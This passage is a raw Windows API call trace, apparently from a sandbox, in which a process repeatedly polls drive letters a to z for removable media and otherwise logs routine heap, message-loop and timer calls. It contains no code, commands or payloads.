RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0215.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.159] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.159] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.159] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.159] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.159] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.160] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.160] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.160] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.160] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.160] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.160] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.161] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.161] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.161] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.161] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.161] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.161] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.162] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.162] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.162] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.162] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.162] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.163] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.163] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.163] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.163] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.163] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0215.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.164] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0215.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e00 [0215.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e00 | out: hHeap=0x12c0000) returned 1 [0215.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0215.164] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0215.164] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.165] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.165] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.165] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.165] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.166] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0215.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0215.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.166] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.166] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.166] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.166] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.166] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.166] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.167] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.167] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.167] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.167] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.167] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.167] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.168] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.168] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.168] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.168] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.168] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.168] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.169] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.169] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.169] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.169] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.169] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.169] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.170] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.170] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.170] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0215.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.171] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0215.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0215.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0215.172] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0215.172] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.172] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.172] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.172] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0215.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.173] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.173] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0215.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0215.173] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.173] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.173] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.176] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.177] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.177] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.177] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.177] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.177] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.177] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.178] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.178] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.178] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.178] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.178] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.178] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.179] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.179] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.179] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.179] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.179] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.179] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.180] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.180] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.180] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.180] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.180] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0215.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.181] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.181] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.181] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.181] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.182] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0215.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0215.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0215.182] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0215.182] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0215.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.183] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.183] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.183] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d 